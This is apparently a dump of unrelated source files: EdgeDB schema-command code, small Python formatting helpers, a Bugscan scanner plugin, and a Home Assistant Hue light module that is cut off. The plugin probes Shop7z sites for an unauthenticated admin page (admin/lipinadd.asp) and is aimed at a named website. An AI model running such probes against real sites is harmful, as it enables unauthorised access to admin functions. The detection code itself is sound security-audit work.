def _classname_quals_from_name( cls, name: sn.SchemaName, ) -> Tuple[str, ...]: return () @classmethod def _name_qual_from_exprs(cls, schema: s_schema.Schema, exprs: Iterable[str]) -> str: m = hashlib.sha1() for expr in exprs: m.update(expr.encode()) return m.hexdigest() def _get_ast_node(self, schema: s_schema.Schema, context: sd.CommandContext ) -> Type[qlast.DDLOperation]: subject_ctx = self.get_referrer_context(context) ref_astnode: Type[qlast.DDLOperation] = getattr(self, 'referenced_astnode', None) if subject_ctx is not None and ref_astnode is not None: return ref_astnode else: if isinstance(self.astnode, (list, tuple)): return self.astnode[1] else: return self.astnode def _build_alter_cmd_stack( self, schema: s_schema.Schema, context: sd.CommandContext, scls: so.Object, *, referrer: Optional[so.Object] = None ) -> Tuple[sd.DeltaRoot, sd.Command]: delta = sd.DeltaRoot() if referrer is None: assert isinstance(scls, ReferencedObject) referrer = scls.get_referrer(schema) obj = referrer object_stack = [] if type(self) != type(referrer): object_stack.append(referrer) while obj is not None: if isinstance(obj, ReferencedObject): obj = obj.get_referrer(schema) object_stack.append(obj) else: obj = None cmd: sd.Command = delta for obj in reversed(object_stack): assert obj is not None alter_cmd_cls = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, type(obj)) alter_cmd = alter_cmd_cls(classname=obj.get_name(schema)) cmd.add(alter_cmd) cmd = alter_cmd return delta, cmd class CreateReferencedObject( ReferencedObjectCommand[ReferencedT], sd.CreateObject[ReferencedT], ): referenced_astnode: ClassVar[Type[qlast.ObjectDDL]] @classmethod def _cmd_tree_from_ast( cls, schema: s_schema.Schema, astnode: qlast.DDLOperation, context: sd.CommandContext, ) -> sd.Command: cmd = super()._cmd_tree_from_ast(schema, astnode, context) if isinstance(astnode, cls.referenced_astnode): objcls = cls.get_schema_metaclass() referrer_ctx = cls.get_referrer_context_or_die(context) referrer_class = referrer_ctx.op.get_schema_metaclass() referrer_name = referrer_ctx.op.classname refdict = referrer_class.get_refdict_for_class(objcls) cmd.set_attribute_value( refdict.backref_attr, so.ObjectShell( name=referrer_name, schemaclass=referrer_class, ), ) cmd.set_attribute_value('is_local', True) if getattr(astnode, 'is_abstract', None): cmd.set_attribute_value('is_abstract', True) return cmd def _get_ast_node(self, schema: s_schema.Schema, context: sd.CommandContext ) -> Type[qlast.DDLOperation]: scls = self.get_object(schema, context) assert isinstance(scls, ReferencedInheritingObject) implicit_bases = scls.get_implicit_bases(schema) if implicit_bases and not context.declarative: mcls = self.get_schema_metaclass() Alter = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, mcls) alter = Alter(classname=self.classname) return alter._get_ast_node(schema, context) else: return super()._get_ast_node(schema, context) @classmethod def as_inherited_ref_cmd(cls, schema: s_schema.Schema, context: sd.CommandContext, astnode: qlast.ObjectDDL, parents: Any) -> sd.Command: cmd = cls(classname=cls._classname_from_ast(schema, astnode, context)) cmd.set_attribute_value('name', cmd.classname) return cmd @classmethod def as_inherited_ref_ast(cls, schema: s_schema.Schema, context: sd.CommandContext, name: str, parent: ReferencedObject) -> qlast.ObjectDDL: nref = cls.get_inherited_ref_name(schema, context, parent, name) astnode_cls = cls.referenced_astnode astnode = astnode_cls(name=nref) assert isinstance(astnode, 
qlast.ObjectDDL) return astnode @classmethod def get_inherited_ref_name(cls, schema: s_schema.Schema, context: sd.CommandContext, parent: ReferencedObject, name: str ) -> qlast.ObjectRef: # reduce name to shortname if sn.Name.is_qualified(name): shortname: str = sn.shortname_from_fullname(sn.Name(name)) else: shortname = name nref = qlast.ObjectRef( name=shortname, module=parent.get_shortname(schema).module, ) return nref def _create_innards( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: referrer_ctx = self.get_referrer_context(context) if referrer_ctx is None: return super()._create_innards(schema, context) else: referrer = referrer_ctx.scls schema = self._create_ref(schema, context, referrer) return super()._create_innards(schema, context) def _create_ref( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.Object, ) -> s_schema.Schema: referrer_cls = type(referrer) mcls = type(self.scls) refdict = referrer_cls.get_refdict_for_class(mcls) schema = referrer.add_classref(schema, refdict.attr, self.scls) return schema class DeleteReferencedObjectCommand( ReferencedObjectCommand[ReferencedT], sd.DeleteObject[ReferencedT], ): def _delete_innards( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: schema = super()._delete_innards(schema, context) referrer_ctx = self.get_referrer_context(context) if referrer_ctx is None: return schema else: referrer = referrer_ctx.scls schema = self._delete_ref(schema, context, referrer) return schema def _delete_ref( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.Object, ) -> s_schema.Schema: scls = self.scls referrer_class = type(referrer) mcls = type(scls) refdict = referrer_class.get_refdict_for_class(mcls) reftype = referrer_class.get_field(refdict.attr).type refname = reftype.get_key_for(schema, self.scls) return referrer.del_classref(schema, refdict.attr, refname) class ReferencedInheritingObjectCommand( ReferencedObjectCommand[ReferencedInheritingObjectT], inheriting.InheritingObjectCommand[ReferencedInheritingObjectT], ): def _get_implicit_ref_bases( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.InheritingObject, referrer_field: str, fq_name: sn.SchemaName, ) -> List[ReferencedInheritingObjectT]: assert isinstance(referrer, so.QualifiedObject) child_referrer_bases = referrer.get_bases(schema).objects(schema) implicit_bases = [] ref_field_type = type(referrer).get_field(referrer_field).type for ref_base in child_referrer_bases: fq_name_in_child = self._classname_from_name( fq_name, ref_base.get_name(schema)) refname = ref_field_type.get_key_for_name(schema, fq_name_in_child) parent_coll = ref_base.get_field_value(schema, referrer_field) parent_item = parent_coll.get(schema, refname, default=None) if (parent_item is not None and not parent_item.get_is_final(schema)): implicit_bases.append(parent_item) return implicit_bases def get_ref_implicit_base_delta( self, schema: s_schema.Schema, context: sd.CommandContext, refcls: ReferencedInheritingObjectT, implicit_bases: List[ReferencedInheritingObjectT], ) -> inheriting.BaseDelta_T: child_bases = refcls.get_bases(schema).objects(schema) default_base = refcls.get_default_base_name() explicit_bases = [ b for b in child_bases if b.generic(schema) and b.get_name(schema) != default_base ] new_bases = implicit_bases + explicit_bases return inheriting.delta_bases( [b.get_name(schema) for b in child_bases], [b.get_name(schema) for b in new_bases], ) def _validate( self, schema: 
s_schema.Schema, context: sd.CommandContext ) -> None: scls = self.scls implicit_bases = [ b for b in scls.get_bases(schema).objects(schema) if not b.generic(schema) ] referrer_ctx = self.get_referrer_context_or_die(context) objcls = self.get_schema_metaclass() referrer_class = referrer_ctx.op.get_schema_metaclass() refdict = referrer_class.get_refdict_for_class(objcls) if context.declarative and scls.get_is_local(schema): if (implicit_bases and refdict.requires_explicit_overloaded and not self.get_attribute_value('declared_overloaded')): ancestry = [] for obj in implicit_bases: bref = obj.get_referrer(schema) assert bref is not None ancestry.append(bref) raise errors.SchemaDefinitionError( f'{self.scls.get_verbosename(schema, with_parent=True)} ' f'must be declared using the `overloaded` keyword because ' f'it is defined in the following ancestor(s): ' f'{", ".join(a.get_shortname(schema) for a in ancestry)}', context=self.source_context, ) elif (not implicit_bases and self.get_attribute_value('declared_overloaded')): raise errors.SchemaDefinitionError( f'{self.scls.get_verbosename(schema, with_parent=True)}: ' f'cannot be declared `overloaded` as there are no ' f'ancestors defining it.', context=self.source_context, ) def _propagate_ref_op(self, schema: s_schema.Schema, context: sd.CommandContext, scls: ReferencedInheritingObject, cb: Callable[[sd.Command, str], None] ) -> s_schema.Schema: rec = context.current().enable_recursion context.current().enable_recursion = False referrer_ctx = self.get_referrer_context_or_die(context) referrer = referrer_ctx.scls referrer_class = type(referrer) mcls = type(scls) refdict = referrer_class.get_refdict_for_class(mcls) reftype = referrer_class.get_field(refdict.attr).type refname = reftype.get_key_for(schema, self.scls) r_alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, referrer_class) alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, mcls) for descendant in scls.ordered_descendants(schema): d_name = descendant.get_name(schema) assert isinstance(descendant, ReferencedObject) d_referrer = descendant.get_referrer(schema) assert d_referrer is not None d_alter_cmd = alter_cmdcls(classname=d_name) r_alter_cmd = r_alter_cmdcls( classname=d_referrer.get_name(schema)) with r_alter_cmd.new_context(schema, context, d_referrer): with d_alter_cmd.new_context(schema, context, descendant): cb(d_alter_cmd, refname) r_alter_cmd.add(d_alter_cmd) schema = r_alter_cmd.apply(schema, context) self.add(r_alter_cmd) context.current().enable_recursion = rec return schema class CreateReferencedInheritingObject( CreateReferencedObject[ReferencedInheritingObjectT], inheriting.CreateInheritingObject[ReferencedInheritingObjectT], ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], ): def _get_ast( self, schema: s_schema.Schema, context: sd.CommandContext, *, parent_node: Optional[qlast.DDLOperation] = None, ) -> Optional[qlast.DDLOperation]: refctx = type(self).get_referrer_context(context) if refctx is not None: if not self.get_attribute_value('is_local'): if context.descriptive_mode: astnode = super()._get_ast( schema, context, parent_node=parent_node, ) assert astnode is not None inherited_from = [ sn.quals_from_fullname(b)[0] for b in self.get_implicit_bases( schema, context, self.get_attribute_value('bases'), ) ] astnode.system_comment = ( f'inherited from {", ".join(inherited_from)}' ) return astnode else: return None else: astnode = super()._get_ast( schema, context, parent_node=parent_node) if 
context.declarative: scls = self.get_object(schema, context) assert isinstance(scls, ReferencedInheritingObject) implicit_bases = scls.get_implicit_bases(schema) objcls = self.get_schema_metaclass() referrer_class = refctx.op.get_schema_metaclass() refdict = referrer_class.get_refdict_for_class(objcls) if refdict.requires_explicit_overloaded and implicit_bases: assert astnode is not None astnode.declared_overloaded = True return astnode else: return super()._get_ast(schema, context, parent_node=parent_node) def _create_begin( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: referrer_ctx = self.get_referrer_context(context) implicit_bases = None if referrer_ctx is not None and not context.canonical: objcls = self.get_schema_metaclass() referrer = referrer_ctx.scls if isinstance(referrer, so.InheritingObject): referrer_class = referrer_ctx.op.get_schema_metaclass() refdict = referrer_class.get_refdict_for_class(objcls) implicit_bases = self._get_implicit_ref_bases( schema, context, referrer, refdict.attr, self.classname) if implicit_bases: bases = self.get_attribute_value('bases') if bases: bases = so.ObjectList.create( schema, implicit_bases + [ b for b in bases.objects(schema) if b not in implicit_bases ], ) else: bases = so.ObjectList.create( schema, implicit_bases, ) self.set_attribute_value('bases', bases) schema = super()._create_begin(schema, context) if referrer_ctx is not None and not context.canonical: self._validate(schema, context) return schema def _create_ref( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.Object, ) -> s_schema.Schema: schema = super()._create_ref(schema, context, referrer) if (not self.scls.get_is_final(schema) and isinstance(referrer, so.InheritingObject) and not context.canonical and context.enable_recursion): # Propagate the creation of a new ref to descendants of # our referrer. schema = self._propagate_ref_creation(schema, context, referrer) return schema def _propagate_ref_creation( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.InheritingObject, ) -> s_schema.Schema: get_cmd = sd.ObjectCommandMeta.get_command_class_or_die mcls = type(self.scls) referrer_cls = type(referrer) alter_cmd = get_cmd(sd.AlterObject, referrer_cls) ref_create_cmd = get_cmd(sd.CreateObject, mcls) ref_alter_cmd = get_cmd(sd.AlterObject, mcls) ref_rebase_cmd = get_cmd(inheriting.RebaseInheritingObject, mcls) assert issubclass(ref_create_cmd, CreateReferencedInheritingObject) assert issubclass(ref_rebase_cmd, RebaseReferencedInheritingObject) refdict = referrer_cls.get_refdict_for_class(mcls) parent_fq_refname = self.scls.get_name(schema) for child in referrer.children(schema): if not child.allow_ref_propagation(schema, context, refdict): continue alter = alter_cmd(classname=child.get_name(schema)) with alter.new_context(schema, context, child): # This is needed to get the correct inherited name which will # either be created or rebased. ref_field_type = type(child).get_field(refdict.attr).type refname = ref_field_type.get_key_for_name( schema, parent_fq_refname) astnode = ref_create_cmd.as_inherited_ref_ast( schema, context, refname, self.scls) fq_name = self._classname_from_ast(schema, astnode, context) # We cannot check for ref existence in this child at this # time, because it might get created in a sibling branch # of the delta tree. Instead, generate a command group # containing Alter(if_exists) and Create(if_not_exists) # to postpone that check until the application time. 
ref_create = ref_create_cmd.as_inherited_ref_cmd( schema, context, astnode, [self.scls]) ref_create.if_not_exists = True ref_create.set_attribute_value(refdict.backref_attr, child) if child.get_is_derived(schema): # All references in a derived object must # also be marked as derived, to be consistent # with derive_subtype(). ref_create.set_attribute_value('is_derived', True) ref_alter = ref_alter_cmd(classname=fq_name, if_exists=True) ref_alter.add(ref_rebase_cmd( classname=fq_name, implicit=True, added_bases=(), removed_bases=(), )) alter.add(ref_alter) alter.add(ref_create) self.add(alter) return schema def get_implicit_bases( self, schema: s_schema.Schema, context: sd.CommandContext, bases: Any, ) -> Sequence[str]: mcls = self.get_schema_metaclass() default_base = mcls.get_default_base_name() if isinstance(bases, so.ObjectCollectionShell): base_names = [ b.name for b in bases.items if b.name is not None ] else: assert isinstance(bases, so.ObjectList) base_names = list(bases.names(schema)) # Filter out explicit bases implicit_bases = [ b for b in base_names if ( b != default_base and isinstance(b, sn.SchemaName) and sn.shortname_from_fullname(b) != b ) ] return implicit_bases class AlterReferencedInheritingObject( ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], inheriting.AlterInheritingObject[ReferencedInheritingObjectT], ): @classmethod def _cmd_tree_from_ast( cls, schema: s_schema.Schema, astnode: qlast.DDLOperation, context: sd.CommandContext, ) -> AlterReferencedInheritingObject[ReferencedInheritingObjectT]: cmd = super()._cmd_tree_from_ast(schema, astnode, context) refctx = cls.get_referrer_context(context) if refctx is not None: cmd.set_attribute_value('is_local', True) assert isinstance(cmd, AlterReferencedInheritingObject) return cmd def _alter_begin( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: scls = self.scls was_local = scls.get_is_local(schema) schema = super()._alter_begin(schema, context) now_local = scls.get_is_local(schema) if not was_local and now_local: self._validate(schema, context) return schema class RebaseReferencedInheritingObject( ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], inheriting.RebaseInheritingObject[ReferencedInheritingObjectT], ): implicit = struct.Field(bool, default=False) def apply( self, schema: s_schema.Schema, context: sd.CommandContext, ) -> s_schema.Schema: if not context.canonical and self.implicit: mcls = self.get_schema_metaclass() refctx = self.get_referrer_context_or_die(context) referrer = refctx.scls assert isinstance(referrer, so.InheritingObject) refdict = type(referrer).get_refdict_for_class(mcls) implicit_bases = self._get_implicit_ref_bases( schema, context, referrer=referrer, referrer_field=refdict.attr, fq_name=self.classname, ) scls = self.get_object(schema, context) removed_bases, added_bases = self.get_ref_implicit_base_delta( schema, context, scls, implicit_bases=implicit_bases, ) self.added_bases = added_bases self.removed_bases = removed_bases return super().apply(schema, context) class RenameReferencedInheritingObject( ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], sd.RenameObject, ): def _rename_begin(self, schema: s_schema.Schema, context: sd.CommandContext ) -> s_schema.Schema: orig_schema = schema schema = super()._rename_begin(schema, context) scls = self.scls if not context.canonical and not scls.generic(schema): implicit_bases = scls.get_implicit_bases(schema) non_renamed_bases = set(implicit_bases) - context.renamed_objs # This 
object is inherited from one or more ancestors that # are not renamed in the same op, and this is an error. if non_renamed_bases: bases_str = ', '.join( b.get_verbosename(schema, with_parent=True) for b in non_renamed_bases ) verb = 'are' if len(non_renamed_bases) > 1 else 'is' vn = scls.get_verbosename(orig_schema) raise errors.SchemaDefinitionError( f'cannot rename inherited {vn}', details=( f'{vn} is inherited from ' f'{bases_str}, which {verb} not being renamed' ), context=self.source_context, ) if context.enable_recursion: schema = self._propagate_ref_rename(schema, context, scls) else: for op in self.get_subcommands(type=sd.ObjectCommand): schema = op.apply(schema, context) return schema def _propagate_ref_rename(self, schema: s_schema.Schema, context: sd.CommandContext, scls: ReferencedInheritingObject ) -> s_schema.Schema: rename_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.RenameObject, type(scls)) def _ref_rename(alter_cmd: sd.Command, refname: str) -> None: astnode = rename_cmdcls.astnode( new_name=qlast.ObjectRef( name=refname, ), ) rename_cmd = rename_cmdcls._rename_cmd_from_ast( schema, astnode, context) alter_cmd.add(rename_cmd) return self._propagate_ref_op(schema, context, scls, cb=_ref_rename) class DeleteReferencedInheritingObject( DeleteReferencedObjectCommand[ReferencedInheritingObjectT], inheriting.DeleteInheritingObject[ReferencedInheritingObjectT], ReferencedInheritingObjectCommand[ReferencedInheritingObjectT], ): def _delete_ref( self, schema: s_schema.Schema, context: sd.CommandContext, referrer: so.Object, ) -> s_schema.Schema: scls = self.scls referrer_class = type(referrer) mcls = type(scls) refdict = referrer_class.get_refdict_for_class(mcls) reftype = referrer_class.get_field(refdict.attr).type refname = reftype.get_key_for(schema, self.scls) self_name = self.scls.get_name(schema) schema = referrer.del_classref(schema, refdict.attr, refname) if (isinstance(referrer, so.InheritingObject) and not context.canonical): if (not context.in_deletion(offset=1) and not context.disable_dep_verification): implicit_bases = set(self._get_implicit_ref_bases( schema, context, referrer, refdict.attr, self_name)) deleted_bases = set() for ctx in context.stack: if isinstance(ctx.op, type(self)): deleted_bases.add(ctx.op.scls) implicit_bases -= deleted_bases if implicit_bases: # Cannot remove inherited objects. 
vn = scls.get_verbosename(schema, with_parent=True) parents = [ b.get_field_value(schema, refdict.backref_attr) for b in implicit_bases ] pnames = '\n- '.join( p.get_verbosename(schema, with_parent=True) for p in parents ) raise errors.SchemaError( f'cannot drop inherited {vn}', context=self.source_context, details=f'{vn} is inherited from:\n- {pnames}' ) alter_cmd = sd.ObjectCommandMeta.get_command_class_or_die( sd.AlterObject, referrer_class) for child in referrer.children(schema): assert isinstance(child, so.QualifiedObject) child_coll = child.get_field_value(schema, refdict.attr) fq_refname_in_child = self._classname_from_name( self_name, child.get_name(schema), ) child_refname = reftype.get_key_for_name( schema, fq_refname_in_child) existing = child_coll.get(schema, child_refname, None) if existing is not None: alter = alter_cmd(classname=child.get_name(schema)) with alter.new_context(schema, context, child): schema, cmd = self._propagate_ref_deletion( schema, context, refdict, child, existing) alter.add(cmd) self.add(alter) return schema def _propagate_ref_deletion( self, schema: s_schema.Schema, context: sd.CommandContext, refdict: so.RefDict, child: so.InheritingObject, child_ref: ReferencedInheritingObjectT, ) -> Tuple[s_schema.Schema, sd.Command]: get_cmd = sd.ObjectCommandMeta.get_command_class_or_die mcls = type(self.scls) name = child_ref.get_name(schema) implicit_bases = self._get_implicit_ref_bases( schema, context, child, refdict.attr, name) cmd: sd.Command if child_ref.get_is_local(schema) or implicit_bases: # Child is either defined locally or is inherited # from another parent, so we need to do a rebase. removed_bases, added_bases = self.get_ref_implicit_base_delta( schema, context, child_ref, implicit_bases) rebase_cmd_cls = get_cmd(inheriting.RebaseInheritingObject, mcls) rebase_cmd = rebase_cmd_cls( classname=name, added_bases=added_bases, removed_bases=removed_bases, ) ref_alter_cmd = get_cmd(sd.AlterObject, mcls) cmd = ref_alter_cmd(classname=name) cmd.add(rebase_cmd) else: # The ref in child should no longer exist. ref_del_cmd = get_cmd(sd.DeleteObject, mcls) cmd = ref_del_cmd(classname=name) schema = cmd.apply(schema, context) return schema, cmd
[((34717, 34750), 'edb.common.struct.Field', 'struct.Field', (['bool'], {'default': '(False)'}), '(bool, default=False)\n', (34729, 34750), False, 'from edb.common import struct\n'), ((12110, 12124), 'hashlib.sha1', 'hashlib.sha1', ([], {}), '()\n', (12122, 12124), False, 'import hashlib\n'), ((3477, 3550), 'edb.errors.SchemaError', 'errors.SchemaError', (['f"""cannot derive {self!r}({derived_name}) from itself"""'], {}), "(f'cannot derive {self!r}({derived_name}) from itself')\n", (3495, 3550), False, 'from edb import errors\n'), ((36944, 37122), 'edb.errors.SchemaDefinitionError', 'errors.SchemaDefinitionError', (['f"""cannot rename inherited {vn}"""'], {'details': 'f"""{vn} is inherited from {bases_str}, which {verb} not being renamed"""', 'context': 'self.source_context'}), "(f'cannot rename inherited {vn}', details=\n f'{vn} is inherited from {bases_str}, which {verb} not being renamed',\n context=self.source_context)\n", (36972, 37122), False, 'from edb import errors\n'), ((38084, 38113), 'edb.edgeql.ast.ObjectRef', 'qlast.ObjectRef', ([], {'name': 'refname'}), '(name=refname)\n', (38099, 38113), True, 'from edb.edgeql import ast as qlast\n'), ((40315, 40449), 'edb.errors.SchemaError', 'errors.SchemaError', (['f"""cannot drop inherited {vn}"""'], {'context': 'self.source_context', 'details': 'f"""{vn} is inherited from:\n- {pnames}"""'}), '(f\'cannot drop inherited {vn}\', context=self.\n source_context, details=f"""{vn} is inherited from:\n- {pnames}""")\n', (40333, 40449), False, 'from edb import errors\n')]
Jakuko99/effectb
tools.py
ab6688ce3679cdd2cf43038f7bfef67dabf97c1b
from calendar import month_name


class Tools:
    """Small formatting helpers for dates, durations and list-like values."""

    def __init__(self):
        self.output = ""

    def formatDate(self, date):
        # "2021-07-04" -> "04. July 2021"
        elements = date.split("-")
        return f"{elements[2]}. {month_name[int(elements[1])]} {elements[0]}"

    def shortenText(self, string, n):
        # Return the first n sentences of the string (sentences split on ".").
        first = string.find(".")
        for _ in range(n - 1):
            if not string.find(".", first + 1) == -1:
                first = string.find(".", first + 1)
        return f"{string[:first-len(string)]}."

    def tupleUnpack(self, tup):
        # Join tuple items with single spaces.
        self.output = ""
        for item in tup:
            self.output += f"{item} "
        return self.output[:-1]

    def joinList(self, list):
        # Join all items with ", ".
        self.output = ""
        for item in list:
            self.output += f"{item}, "
        return self.output[:-2]  # remove trailing ', '

    def partialJoin(self, list, n):
        # Join at most the first n items with ", ".
        self.output = ""
        i = 0
        for item in list:
            self.output += f"{item}, "
            i += 1
            if i >= n:
                break
        return self.output[:-2]

    def processFilmography(self, list, n):
        # Format up to n filmography entries as "Title (year)" when a year is known.
        self.output = ""
        i = 0
        for item in list:
            if 'year' in item:
                self.output += f"{item['title']} ({item['year']}), "
            else:
                self.output += f"{item['title'].replace(' ()', '')}, "
            i += 1
            if i >= n:
                break
        return self.output[:-2]

    def convertTime(self, runtime):
        # Convert a runtime in minutes to "H h M min" (or "M min" under an hour).
        time = int(runtime)
        mins = time % 60
        hours = int(time / 60)
        if hours >= 1:
            return f"{hours} h {mins} min"
        else:
            return f"{mins} min"
[]
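A quick, hypothetical illustration of how the helpers above behave (module name and values are illustrative only):

# Assuming tools.py is importable as a module named `tools`.
from tools import Tools

t = Tools()
print(t.formatDate("2021-07-04"))            # -> "04. July 2021"
print(t.convertTime("135"))                  # -> "2 h 15 min"
print(t.partialJoin(["a", "b", "c"], 2))     # -> "a, b"
print(t.shortenText("One. Two. Three.", 2))  # -> "One. Two."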
csadsl/poc_exp
Bugscan_exploits-master/exp_list/exp-2307.py
e3146262e7403f19f49ee2db56338fa3f8e119c9
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 烽火戏诸侯
#_PlugName_ = Shop7z /admin/lipinadd.asp unauthorized access
import re

def assign(service, arg):
    # Only handle targets tagged as Shop7z installations.
    if service == "shop7z":
        return True, arg

def audit(arg):
    # The gift-add admin page should require a login; if it is reachable
    # anonymously and still contains its form fields, report a security hole.
    payload = 'admin/lipinadd.asp'
    target = arg + payload
    code, head, res, errcode, _ = curl.curl2(target)

    if code == 200 and 'name="lipinname"' in res and 'name="showflag"' in res:
        security_hole(target)

if __name__ == '__main__':
    # curl and security_hole are supplied by the scanner harness (dummy module).
    from dummy import *
    audit(assign('shop7z', 'http://www.99ysbjw.com/')[1])
[]
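Outside the Bugscan-style harness (which injects curl and security_hole), the same unauthenticated-access check can be sketched with the requests library; this is an illustrative standalone equivalent under that assumption, not part of the plugin interface:

# Standalone sketch of the audit() logic above, using requests instead of the
# framework's curl wrapper. For illustration against lab targets only.
import requests

def is_vulnerable(base_url, timeout=10):
    target = base_url + 'admin/lipinadd.asp'
    try:
        resp = requests.get(target, timeout=timeout)
    except requests.RequestException:
        return False
    body = resp.text
    return (resp.status_code == 200
            and 'name="lipinname"' in body
            and 'name="showflag"' in body)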
dlangerm/core
homeassistant/components/hue/light.py
643acbf9484fd05161d7e9f2228c9c92a5ce7d0b
"""Support for the Philips Hue lights.""" from __future__ import annotations from datetime import timedelta from functools import partial import logging import random import aiohue import async_timeout from homeassistant.components.light import ( ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_EFFECT, ATTR_FLASH, ATTR_HS_COLOR, ATTR_TRANSITION, EFFECT_COLORLOOP, EFFECT_RANDOM, FLASH_LONG, FLASH_SHORT, SUPPORT_BRIGHTNESS, SUPPORT_COLOR, SUPPORT_COLOR_TEMP, SUPPORT_EFFECT, SUPPORT_FLASH, SUPPORT_TRANSITION, LightEntity, ) from homeassistant.core import callback from homeassistant.exceptions import PlatformNotReady from homeassistant.helpers.debounce import Debouncer from homeassistant.helpers.entity import DeviceInfo from homeassistant.helpers.update_coordinator import ( CoordinatorEntity, DataUpdateCoordinator, UpdateFailed, ) from homeassistant.util import color from .const import ( DOMAIN as HUE_DOMAIN, GROUP_TYPE_LIGHT_GROUP, GROUP_TYPE_LIGHT_SOURCE, GROUP_TYPE_LUMINAIRE, GROUP_TYPE_ROOM, REQUEST_REFRESH_DELAY, ) from .helpers import remove_devices SCAN_INTERVAL = timedelta(seconds=5) _LOGGER = logging.getLogger(__name__) SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR SUPPORT_HUE = { "Extended color light": SUPPORT_HUE_EXTENDED, "Color light": SUPPORT_HUE_COLOR, "Dimmable light": SUPPORT_HUE_DIMMABLE, "On/Off plug-in unit": SUPPORT_HUE_ON_OFF, "Color temperature light": SUPPORT_HUE_COLOR_TEMP, } ATTR_IS_HUE_GROUP = "is_hue_group" GAMUT_TYPE_UNAVAILABLE = "None" # Minimum Hue Bridge API version to support groups # 1.4.0 introduced extended group info # 1.12 introduced the state object for groups # 1.13 introduced "any_on" to group state objects GROUP_MIN_API_VERSION = (1, 13, 0) async def async_setup_platform(hass, config, async_add_entities, discovery_info=None): """Old way of setting up Hue lights. Can only be called when a user accidentally mentions hue platform in their config. But even in that case it would have been ignored. 
""" def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id): """Create the light.""" api_item = api[item_id] if is_group: supported_features = 0 for light_id in api_item.lights: if light_id not in bridge.api.lights: continue light = bridge.api.lights[light_id] supported_features |= SUPPORT_HUE.get(light.type, SUPPORT_HUE_EXTENDED) supported_features = supported_features or SUPPORT_HUE_EXTENDED else: supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED) return item_class( coordinator, bridge, is_group, api_item, supported_features, rooms ) async def async_setup_entry(hass, config_entry, async_add_entities): """Set up the Hue lights from a config entry.""" bridge = hass.data[HUE_DOMAIN][config_entry.entry_id] api_version = tuple(int(v) for v in bridge.api.config.apiversion.split(".")) rooms = {} allow_groups = bridge.allow_groups supports_groups = api_version >= GROUP_MIN_API_VERSION if allow_groups and not supports_groups: _LOGGER.warning("Please update your Hue bridge to support groups") light_coordinator = DataUpdateCoordinator( hass, _LOGGER, name="light", update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update), update_interval=SCAN_INTERVAL, request_refresh_debouncer=Debouncer( bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True ), ) # First do a refresh to see if we can reach the hub. # Otherwise we will declare not ready. await light_coordinator.async_refresh() if not light_coordinator.last_update_success: raise PlatformNotReady if not supports_groups: update_lights_without_group_support = partial( async_update_items, bridge, bridge.api.lights, {}, async_add_entities, partial(create_light, HueLight, light_coordinator, bridge, False, rooms), None, ) # We add a listener after fetching the data, so manually trigger listener bridge.reset_jobs.append( light_coordinator.async_add_listener(update_lights_without_group_support) ) return group_coordinator = DataUpdateCoordinator( hass, _LOGGER, name="group", update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update), update_interval=SCAN_INTERVAL, request_refresh_debouncer=Debouncer( bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True ), ) if allow_groups: update_groups = partial( async_update_items, bridge, bridge.api.groups, {}, async_add_entities, partial(create_light, HueLight, group_coordinator, bridge, True, None), None, ) bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups)) cancel_update_rooms_listener = None @callback def _async_update_rooms(): """Update rooms.""" nonlocal cancel_update_rooms_listener rooms.clear() for item_id in bridge.api.groups: group = bridge.api.groups[item_id] if group.type != GROUP_TYPE_ROOM: continue for light_id in group.lights: rooms[light_id] = group.name # Once we do a rooms update, we cancel the listener # until the next time lights are added bridge.reset_jobs.remove(cancel_update_rooms_listener) cancel_update_rooms_listener() # pylint: disable=not-callable cancel_update_rooms_listener = None @callback def _setup_rooms_listener(): nonlocal cancel_update_rooms_listener if cancel_update_rooms_listener is not None: # If there are new lights added before _async_update_rooms # is called we should not add another listener return cancel_update_rooms_listener = group_coordinator.async_add_listener( _async_update_rooms ) bridge.reset_jobs.append(cancel_update_rooms_listener) _setup_rooms_listener() await group_coordinator.async_refresh() update_lights_with_group_support = partial( 
